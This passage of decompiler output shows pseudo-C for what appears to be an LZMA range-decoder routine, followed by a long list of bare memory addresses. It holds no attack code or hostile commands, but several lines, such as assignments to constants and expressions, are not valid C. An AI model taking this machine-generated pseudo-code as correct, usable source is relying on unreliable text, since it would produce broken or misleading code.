							 *(__ebp - 0x2c) = __eax;
							 *(__ebp - 0x28) =  *(__ebp - 0x2c);
							goto L89;
						case 0xc:
							L99:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0xc;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t334 = __ebp - 0x70;
							 *_t334 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t334;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							__eax =  *(__ebp - 0x2c);
							goto L101;
						case 0xd:
							L37:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0xd;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t122 = __ebp - 0x70;
							 *_t122 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t122;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							L39:
							__eax =  *(__ebp - 0x40);
							__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
							if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
								goto L48;
							}
							__eflags = __ebx - 0x100;
							if(__ebx >= 0x100) {
								goto L54;
							}
							L41:
							__eax =  *(__ebp - 0x5b) & 0x000000ff;
							 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
							__ecx =  *(__ebp - 0x58);
							__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
							 *(__ebp - 0x48) = __eax;
							__eax = __eax + 1;
							__eax = __eax << 8;
							__eax = __eax + __ebx;
							__esi =  *(__ebp - 0x58) + __eax * 2;
							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
							__ax =  *__esi;
							 *(__ebp - 0x54) = __esi;
							__edx = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
							__eflags =  *(__ebp - 0xc) - __ecx;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								 *(__ebp - 0x40) = 1;
								__cx = __ax >> 5;
								__eflags = __eax;
								__ebx = __ebx + __ebx + 1;
								 *__esi = __ax;
							} else {
								 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edx;
								0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							__eflags =  *(__ebp - 0x10) - 0x1000000;
							 *(__ebp - 0x44) = __ebx;
							if( *(__ebp - 0x10) >= 0x1000000) {
								goto L39;
							} else {
								goto L37;
							}
						case 0xe:
							L46:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0xe;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t156 = __ebp - 0x70;
							 *_t156 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t156;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							while(1) {
								L48:
								__eflags = __ebx - 0x100;
								if(__ebx >= 0x100) {
									break;
								}
								__eax =  *(__ebp - 0x58);
								__edx = __ebx + __ebx;
								__ecx =  *(__ebp - 0x10);
								__esi = __edx + __eax;
								__ecx =  *(__ebp - 0x10) >> 0xb;
								__ax =  *__esi;
								 *(__ebp - 0x54) = __esi;
								__edi = __ax & 0x0000ffff;
								__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
								__eflags =  *(__ebp - 0xc) - __ecx;
								if( *(__ebp - 0xc) >= __ecx) {
									 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
									 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
									__cx = __ax;
									_t170 = __edx + 1; // 0x1
									__ebx = _t170;
									__cx = __ax >> 5;
									__eflags = __eax;
									 *__esi = __ax;
								} else {
									 *(__ebp - 0x10) = __ecx;
									0x800 = 0x800 - __edi;
									0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
									__ebx = __ebx + __ebx;
									 *__esi = __cx;
								}
								__eflags =  *(__ebp - 0x10) - 0x1000000;
								 *(__ebp - 0x44) = __ebx;
								if( *(__ebp - 0x10) >= 0x1000000) {
									continue;
								} else {
									goto L46;
								}
							}
							L54:
							_t173 = __ebp - 0x34;
							 *_t173 =  *(__ebp - 0x34) & 0x00000000;
							__eflags =  *_t173;
							goto L55;
						case 0xf:
							L58:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0xf;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t203 = __ebp - 0x70;
							 *_t203 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t203;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							L60:
							__eflags = __ebx - 0x100;
							if(__ebx >= 0x100) {
								L55:
								__al =  *(__ebp - 0x44);
								 *(__ebp - 0x5c) =  *(__ebp - 0x44);
								goto L56;
							}
							L61:
							__eax =  *(__ebp - 0x58);
							__edx = __ebx + __ebx;
							__ecx =  *(__ebp - 0x10);
							__esi = __edx + __eax;
							__ecx =  *(__ebp - 0x10) >> 0xb;
							__ax =  *__esi;
							 *(__ebp - 0x54) = __esi;
							__edi = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
							__eflags =  *(__ebp - 0xc) - __ecx;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								_t217 = __edx + 1; // 0x1
								__ebx = _t217;
								__cx = __ax >> 5;
								__eflags = __eax;
								 *__esi = __ax;
							} else {
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							__eflags =  *(__ebp - 0x10) - 0x1000000;
							 *(__ebp - 0x44) = __ebx;
							if( *(__ebp - 0x10) >= 0x1000000) {
								goto L60;
							} else {
								goto L58;
							}
						case 0x10:
							L109:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0x10;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t365 = __ebp - 0x70;
							 *_t365 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t365;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							goto L111;
						case 0x11:
							goto L69;
						case 0x12:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 0x58);
								 *(__ebp - 0x84) = 0x13;
								__esi =  *(__ebp - 0x58) + 2;
								goto L132;
							}
							__eax =  *(__ebp - 0x4c);
							 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
							__ecx =  *(__ebp - 0x58);
							__eax =  *(__ebp - 0x4c) << 4;
							__eflags = __eax;
							__eax =  *(__ebp - 0x58) + __eax + 4;
							goto L130;
						case 0x13:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								_t469 = __ebp - 0x58;
								 *_t469 =  *(__ebp - 0x58) + 0x204;
								__eflags =  *_t469;
								 *(__ebp - 0x30) = 0x10;
								 *(__ebp - 0x40) = 8;
								L144:
								 *(__ebp - 0x7c) = 0x14;
								goto L145;
							}
							__eax =  *(__ebp - 0x4c);
							__ecx =  *(__ebp - 0x58);
							__eax =  *(__ebp - 0x4c) << 4;
							 *(__ebp - 0x30) = 8;
							__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
							L130:
							 *(__ebp - 0x58) = __eax;
							 *(__ebp - 0x40) = 3;
							goto L144;
						case 0x14:
							 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
							__eax =  *(__ebp - 0x80);
							goto L140;
						case 0x15:
							__eax = 0;
							__eflags =  *(__ebp - 0x38) - 7;
							0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
							__al = __al & 0x000000fd;
							__eax = (__eflags >= 0) - 1 + 0xb;
							 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
							goto L120;
						case 0x16:
							__eax =  *(__ebp - 0x30);
							__eflags = __eax - 4;
							if(__eax >= 4) {
								_push(3);
								_pop(__eax);
							}
							__ecx =  *(__ebp - 4);
							 *(__ebp - 0x40) = 6;
							__eax = __eax << 7;
							 *(__ebp - 0x7c) = 0x19;
							 *(__ebp - 0x58) = __eax;
							goto L145;
						case 0x17:
							L145:
							__eax =  *(__ebp - 0x40);
							 *(__ebp - 0x50) = 1;
							 *(__ebp - 0x48) =  *(__ebp - 0x40);
							goto L149;
						case 0x18:
							L146:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0x18;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t484 = __ebp - 0x70;
							 *_t484 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t484;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							L148:
							_t487 = __ebp - 0x48;
							 *_t487 =  *(__ebp - 0x48) - 1;
							__eflags =  *_t487;
							L149:
							__eflags =  *(__ebp - 0x48);
							if( *(__ebp - 0x48) <= 0) {
								__ecx =  *(__ebp - 0x40);
								__ebx =  *(__ebp - 0x50);
								0 = 1;
								__eax = 1 << __cl;
								__ebx =  *(__ebp - 0x50) - (1 << __cl);
								__eax =  *(__ebp - 0x7c);
								 *(__ebp - 0x44) = __ebx;
								goto L140;
							}
							__eax =  *(__ebp - 0x50);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
							__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
							__eax =  *(__ebp - 0x58);
							__esi = __edx + __eax;
							 *(__ebp - 0x54) = __esi;
							__ax =  *__esi;
							__edi = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
							__eflags =  *(__ebp - 0xc) - __ecx;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								__cx = __ax >> 5;
								__eax = __eax - __ecx;
								__edx = __edx + 1;
								__eflags = __edx;
								 *__esi = __ax;
								 *(__ebp - 0x50) = __edx;
							} else {
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
								 *__esi = __cx;
							}
							__eflags =  *(__ebp - 0x10) - 0x1000000;
							if( *(__ebp - 0x10) >= 0x1000000) {
								goto L148;
							} else {
								goto L146;
							}
						case 0x19:
							__eflags = __ebx - 4;
							if(__ebx < 4) {
								 *(__ebp - 0x2c) = __ebx;
								L119:
								_t393 = __ebp - 0x2c;
								 *_t393 =  *(__ebp - 0x2c) + 1;
								__eflags =  *_t393;
								L120:
								__eax =  *(__ebp - 0x2c);
								__eflags = __eax;
								if(__eax == 0) {
									 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
									goto L170;
								}
								__eflags = __eax -  *(__ebp - 0x60);
								if(__eax >  *(__ebp - 0x60)) {
									goto L171;
								}
								 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
								__eax =  *(__ebp - 0x30);
								_t400 = __ebp - 0x60;
								 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
								__eflags =  *_t400;
								goto L123;
							}
							__ecx = __ebx;
							__eax = __ebx;
							__ecx = __ebx >> 1;
							__eax = __ebx & 0x00000001;
							__ecx = (__ebx >> 1) - 1;
							__al = __al | 0x00000002;
							__eax = (__ebx & 0x00000001) << __cl;
							__eflags = __ebx - 0xe;
							 *(__ebp - 0x2c) = __eax;
							if(__ebx >= 0xe) {
								__ebx = 0;
								 *(__ebp - 0x48) = __ecx;
								L102:
								__eflags =  *(__ebp - 0x48);
								if( *(__ebp - 0x48) <= 0) {
									__eax = __eax + __ebx;
									 *(__ebp - 0x40) = 4;
									 *(__ebp - 0x2c) = __eax;
									__eax =  *(__ebp - 4);
									__eax =  *(__ebp - 4) + 0x644;
									__eflags = __eax;
									L108:
									__ebx = 0;
									 *(__ebp - 0x58) = __eax;
									 *(__ebp - 0x50) = 1;
									 *(__ebp - 0x44) = 0;
									 *(__ebp - 0x48) = 0;
									L112:
									__eax =  *(__ebp - 0x40);
									__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
									if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
										_t391 = __ebp - 0x2c;
										 *_t391 =  *(__ebp - 0x2c) + __ebx;
										__eflags =  *_t391;
										goto L119;
									}
									__eax =  *(__ebp - 0x50);
									 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
									__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
									__eax =  *(__ebp - 0x58);
									__esi = __edi + __eax;
									 *(__ebp - 0x54) = __esi;
									__ax =  *__esi;
									__ecx = __ax & 0x0000ffff;
									__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
									__eflags =  *(__ebp - 0xc) - __edx;
									if( *(__ebp - 0xc) >= __edx) {
										__ecx = 0;
										 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
										__ecx = 1;
										 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
										__ebx = 1;
										__ecx =  *(__ebp - 0x48);
										__ebx = 1 << __cl;
										__ecx = 1 << __cl;
										__ebx =  *(__ebp - 0x44);
										__ebx =  *(__ebp - 0x44) | __ecx;
										__cx = __ax;
										__cx = __ax >> 5;
										__eax = __eax - __ecx;
										__edi = __edi + 1;
										__eflags = __edi;
										 *(__ebp - 0x44) = __ebx;
										 *__esi = __ax;
										 *(__ebp - 0x50) = __edi;
									} else {
										 *(__ebp - 0x10) = __edx;
										0x800 = 0x800 - __ecx;
										0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
										 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
										 *__esi = __dx;
									}
									__eflags =  *(__ebp - 0x10) - 0x1000000;
									if( *(__ebp - 0x10) >= 0x1000000) {
										L111:
										_t368 = __ebp - 0x48;
										 *_t368 =  *(__ebp - 0x48) + 1;
										__eflags =  *_t368;
										goto L112;
									} else {
										goto L109;
									}
								}
								__ecx =  *(__ebp - 0xc);
								__ebx = __ebx + __ebx;
								 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
								__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
								 *(__ebp - 0x44) = __ebx;
								if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
									__ecx =  *(__ebp - 0x10);
									 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
									__ebx = __ebx | 0x00000001;
									__eflags = __ebx;
									 *(__ebp - 0x44) = __ebx;
								}
								__eflags =  *(__ebp - 0x10) - 0x1000000;
								if( *(__ebp - 0x10) >= 0x1000000) {
									L101:
									_t338 = __ebp - 0x48;
									 *_t338 =  *(__ebp - 0x48) - 1;
									__eflags =  *_t338;
									goto L102;
								} else {
									goto L99;
								}
							}
							__edx =  *(__ebp - 4);
							__eax = __eax - __ebx;
							 *(__ebp - 0x40) = __ecx;
							__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
							goto L108;
						case 0x1a:
							L56:
							__eflags =  *(__ebp - 0x64);
							if( *(__ebp - 0x64) == 0) {
								 *(__ebp - 0x88) = 0x1a;
								goto L170;
							}
							__ecx =  *(__ebp - 0x68);
							__al =  *(__ebp - 0x5c);
							__edx =  *(__ebp - 8);
							 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
							 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
							 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
							 *( *(__ebp - 0x68)) = __al;
							__ecx =  *(__ebp - 0x14);
							 *(__ecx +  *(__ebp - 8)) = __al;
							__eax = __ecx + 1;
							__edx = 0;
							_t192 = __eax %  *(__ebp - 0x74);
							__eax = __eax /  *(__ebp - 0x74);
							__edx = _t192;
							goto L79;
						case 0x1b:
							goto L75;
						case 0x1c:
							while(1) {
								L123:
								__eflags =  *(__ebp - 0x64);
								if( *(__ebp - 0x64) == 0) {
									break;
								}
								__eax =  *(__ebp - 0x14);
								__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
								__eflags = __eax -  *(__ebp - 0x74);
								if(__eax >=  *(__ebp - 0x74)) {
									__eax = __eax +  *(__ebp - 0x74);
									__eflags = __eax;
								}
								__edx =  *(__ebp - 8);
								__cl =  *(__eax + __edx);
								__eax =  *(__ebp - 0x14);
								 *(__ebp - 0x5c) = __cl;
								 *(__eax + __edx) = __cl;
								__eax = __eax + 1;
								__edx = 0;
								_t414 = __eax %  *(__ebp - 0x74);
								__eax = __eax /  *(__ebp - 0x74);
								__edx = _t414;
								__eax =  *(__ebp - 0x68);
								 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
								 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
								 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
								__eflags =  *(__ebp - 0x30);
								 *( *(__ebp - 0x68)) = __cl;
								 *(__ebp - 0x14) = _t414;
								if( *(__ebp - 0x30) > 0) {
									continue;
								} else {
									goto L80;
								}
							}
							 *(__ebp - 0x88) = 0x1c;
							goto L170;
					}
				}
			}

0x00000000
0x004070ab
0x004070ab
0x004070af
0x00407166
0x00407169
0x00407175
0x00407056
0x00407056
0x00407059
0x004073cb
0x004073cb
0x004073ce
0x004073ce
0x004073d4
0x004073da
0x004073e0
0x004073fa
0x004073fd
0x00407403
0x0040740e
0x00407410
0x004073e2
0x004073e2
0x004073f1
0x004073f5
0x004073f5
0x0040741a
0x00407441
0x00407441
0x00407447
0x00407447
0x00000000
0x0040741c
0x0040741c
0x00407420
0x004075cf
0x00000000
0x004075cf
0x0040742c
0x00407433
0x0040743b
0x0040743e
0x00000000
0x0040743e
0x004070b5
0x004070b9
0x004075fa
0x004075fa
0x004075fd
0x00407601
0x00407601
0x004070bf
0x004070c5
0x004070c8
0x004070cc
0x004070cf
0x004070d3
0x00407599
0x004075e5
0x004075ed
0x004075f4
0x004075f6
0x00000000
0x004075f6
0x004070d9
0x004070dc
0x004070e2
0x004070e4
0x004070e4
0x004070e7
0x004070ea
0x004070ed
0x004070f0
0x004070f3
0x004070f6
0x004070f7
0x004070f9
0x004070f9
0x004070f9
0x004070fc
0x004070ff
0x00407102
0x00407105
0x00407105
0x00407108
0x0040710a
0x0040710a
0x0040710d
0x0040710d
0x0040710d
0x00406be3
0x00406be3
0x00406bec
0x00000000
0x00000000
0x00406bf2
0x00000000
0x00406bfd
0x00000000
0x00000000
0x00406c06
0x00406c09
0x00406c0c
0x00406c10
0x00000000
0x00000000
0x00406c16
0x00406c19
0x00406c1b
0x00406c1c
0x00406c1f
0x00406c21
0x00406c22
0x00406c24
0x00406c27
0x00406c2c
0x00406c31
0x00406c3a
0x00406c4d
0x00406c50
0x00406c5c
0x00406c84
0x00406c86
0x00406c94
0x00406c94
0x00406c98
0x00000000
0x00000000
0x00000000
0x00000000
0x00406c88
0x00406c88
0x00406c8b
0x00406c8c
0x00406c8c
0x00000000
0x00406c88
0x00406c62
0x00406c67
0x00406c67
0x00406c70
0x00406c78
0x00406c7b
0x00000000
0x00406c81
0x00406c81
0x00000000
0x00406c81
0x00000000
0x00406c9e
0x00406c9e
0x00406ca2
0x0040754e
0x00000000
0x0040754e
0x00406cab
0x00406cbb
0x00406cbe
0x00406cc1
0x00406cc1
0x00406cc1
0x00406cc4
0x00406cc8
0x00000000
0x00000000
0x00406cca
0x00406cd0
0x00406cfa
0x00406d00
0x00406d07
0x00000000
0x00406d07
0x00406cd6
0x00406cd9
0x00406cde
0x00406cde
0x00406ce9
0x00406cf1
0x00406cf4
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00406d39
0x00406d3f
0x00406d42
0x00406d4f
0x00406d57
0x00000000
0x00000000
0x00406d0e
0x00406d0e
0x00406d12
0x0040755d
0x00000000
0x0040755d
0x00406d1e
0x00406d29
0x00406d29
0x00406d29
0x00406d2c
0x00406d2f
0x00406d32
0x00406d37
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00406d5f
0x00406d61
0x00406d64
0x00406dd5
0x00406dd8
0x00406ddb
0x00406de2
0x00406dec
0x00000000
0x00406dec
0x00406d66
0x00406d6a
0x00406d6d
0x00406d6f
0x00406d72
0x00406d75
0x00406d77
0x00406d7a
0x00406d7c
0x00406d81
0x00406d84
0x00406d87
0x00406d8b
0x00406d92
0x00406d95
0x00406d9c
0x00406da0
0x00406da8
0x00406da8
0x00406da8
0x00406da2
0x00406da2
0x00406da2
0x00406d97
0x00406d97
0x00406d97
0x00406dac
0x00406daf
0x00406dcd
0x00406dcf
0x00000000
0x00406db1
0x00406db1
0x00406db4
0x00406db7
0x00406dba
0x00406dbc
0x00406dbc
0x00406dbc
0x00406dbf
0x00406dc2
0x00406dc4
0x00406dc5
0x00406dc8
0x00000000
0x00406dc8
0x00000000
0x00406ffe
0x00407002
0x00407020
0x00407023
0x0040702a
0x0040702d
0x00407030
0x00407033
0x00407036
0x00407039
0x0040703b
0x00407042
0x00407043
0x00407045
0x00407048
0x0040704b
0x0040704e
0x0040704e
0x00407053
0x00000000
0x00407053
0x00407004
0x00407007
0x0040700a
0x00407014
0x00000000
0x00000000
0x00407068
0x0040706c
0x0040708f
0x00407092
0x00407095
0x0040709f
0x0040706e
0x0040706e
0x00407071
0x00407074
0x00407077
0x00407084
0x00407087
0x00407087
0x00000000
0x00000000
0x00000000
0x00000000
0x0040711c
0x00407120
0x00407127
0x0040712a
0x0040712d
0x00407137
0x00000000
0x00407137
0x00407122
0x00000000
0x00000000
0x00407143
0x00407147
0x0040714e
0x00407151
0x00407154
0x00407149
0x00407149
0x00407149
0x00407157
0x0040715a
0x0040715d
0x0040715d
0x00407160
0x00407163
0x00000000
0x00000000
0x00407203
0x00407203
0x00407207
0x004075a5
0x00000000
0x004075a5
0x0040720d
0x00407210
0x00407213
0x00407217
0x0040721a
0x00407220
0x00407222
0x00407222
0x00407222
0x00407225
0x00407228
0x00000000
0x00000000
0x00406df8
0x00406df8
0x00406dfc
0x00407569
0x00000000
0x00407569
0x00406e02
0x00406e05
0x00406e08
0x00406e0c
0x00406e0f
0x00406e15
0x00406e17
0x00406e17
0x00406e17
0x00406e1a
0x00406e1d
0x00406e1d
0x00406e20
0x00406e23
0x00000000
0x00000000
0x00406e29
0x00406e2f
0x00000000
0x00000000
0x00406e35
0x00406e35
0x00406e39
0x00406e3c
0x00406e3f
0x00406e42
0x00406e45
0x00406e46
0x00406e49
0x00406e4b
0x00406e51
0x00406e54
0x00406e57
0x00406e5a
0x00406e5d
0x00406e60
0x00406e63
0x00406e7f
0x00406e82
0x00406e85
0x00406e88
0x00406e8f
0x00406e93
0x00406e95
0x00406e99
0x00406e65
0x00406e65
0x00406e69
0x00406e71
0x00406e76
0x00406e78
0x00406e7a
0x00406e7a
0x00406e9c
0x00406ea3
0x00406ea6
0x00000000
0x00406eac
0x00000000
0x00406eac
0x00000000
0x00406eb1
0x00406eb1
0x00406eb5
0x00407575
0x00000000
0x00407575
0x00406ebb
0x00406ebe
0x00406ec1
0x00406ec5
0x00406ec8
0x00406ece
0x00406ed0
0x00406ed0
0x00406ed0
0x00406ed3
0x00406ed6
0x00406ed6
0x00406ed6
0x00406edc
0x00000000
0x00000000
0x00406ede
0x00406ee1
0x00406ee4
0x00406ee7
0x00406eea
0x00406eed
0x00406ef0
0x00406ef3
0x00406ef6
0x00406ef9
0x00406efc
0x00406f14
0x00406f17
0x00406f1a
0x00406f1d
0x00406f1d
0x00406f20
0x00406f24
0x00406f26
0x00406efe
0x00406efe
0x00406f06
0x00406f0b
0x00406f0d
0x00406f0f
0x00406f0f
0x00406f29
0x00406f30
0x00406f33
0x00000000
0x00406f35
0x00000000
0x00406f35
0x00406f33
0x00406f3a
0x00406f3a
0x00406f3a
0x00406f3a
0x00000000
0x00000000
0x00406f75
0x00406f75
0x00406f79
0x00407581
0x00000000
0x00407581
0x00406f7f
0x00406f82
0x00406f85
0x00406f89
0x00406f8c
0x00406f92
0x00406f94
0x00406f94
0x00406f94
0x00406f97
0x00406f9a
0x00406f9a
0x00406fa0
0x00406f3e
0x00406f3e
0x00406f41
0x00000000
0x00406f41
0x00406fa2
0x00406fa2
0x00406fa5
0x00406fa8
0x00406fab
0x00406fae
0x00406fb1
0x00406fb4
0x00406fb7
0x00406fba
0x00406fbd
0x00406fc0
0x00406fd8
0x00406fdb
0x00406fde
0x00406fe1
0x00406fe1
0x00406fe4
0x00406fe8
0x00406fea
0x00406fc2
0x00406fc2
0x00406fca
0x00406fcf
0x00406fd1
0x00406fd3
0x00406fd3
0x00406fed
0x00406ff4
0x00406ff7
0x00000000
0x00406ff9
0x00000000
0x00406ff9
0x00000000
0x00407286
0x00407286
0x0040728a
0x004075b1
0x00000000
0x004075b1
0x00407290
0x00407293
0x00407296
0x0040729a
0x0040729d
0x004072a3
0x004072a5
0x004072a5
0x004072a5
0x004072a8
0x00000000
0x00000000
0x00000000
0x00000000
0x00407395
0x00407399
0x004073bb
0x004073be
0x004073c8
0x00000000
0x004073c8
0x0040739b
0x0040739e
0x004073a2
0x004073a5
0x004073a5
0x004073a8
0x00000000
0x00000000
0x00407452
0x00407456
0x00407474
0x00407474
0x00407474
0x0040747b
0x00407482
0x00407489
0x00407489
0x00000000
0x00407489
0x00407458
0x0040745b
0x0040745e
0x00407461
0x00407468
0x004073ac
0x004073ac
0x004073af
0x00000000
0x00000000
0x00407543
0x00407546
0x00000000
0x00000000
0x0040717d
0x0040717f
0x00407186
0x00407187
0x00407189
0x0040718c
0x00000000
0x00000000
0x00407194
0x00407197
0x0040719a
0x0040719c
0x0040719e
0x0040719e
0x0040719f
0x004071a2
0x004071a9
0x004071ac
0x004071ba
0x00000000
0x00000000
0x00407490
0x00407490
0x00407493
0x0040749a
0x00000000
0x00000000
0x0040749f
0x0040749f
0x004074a3
0x004075db
0x00000000
0x004075db
0x004074a9
0x004074ac
0x004074af
0x004074b3
0x004074b6
0x004074bc
0x004074be
0x004074be
0x004074be
0x004074c1
0x004074c4
0x004074c4
0x004074c4
0x004074c4
0x004074c7
0x004074c7
0x004074cb
0x0040752b
0x0040752e
0x00407533
0x00407534
0x00407536
0x00407538
0x0040753b
0x00000000
0x0040753b
0x004074cd
0x004074d3
0x004074d6
0x004074d9
0x004074dc
0x004074df
0x004074e2
0x004074e5
0x004074e8
0x004074eb
0x004074ee
0x00407507
0x0040750a
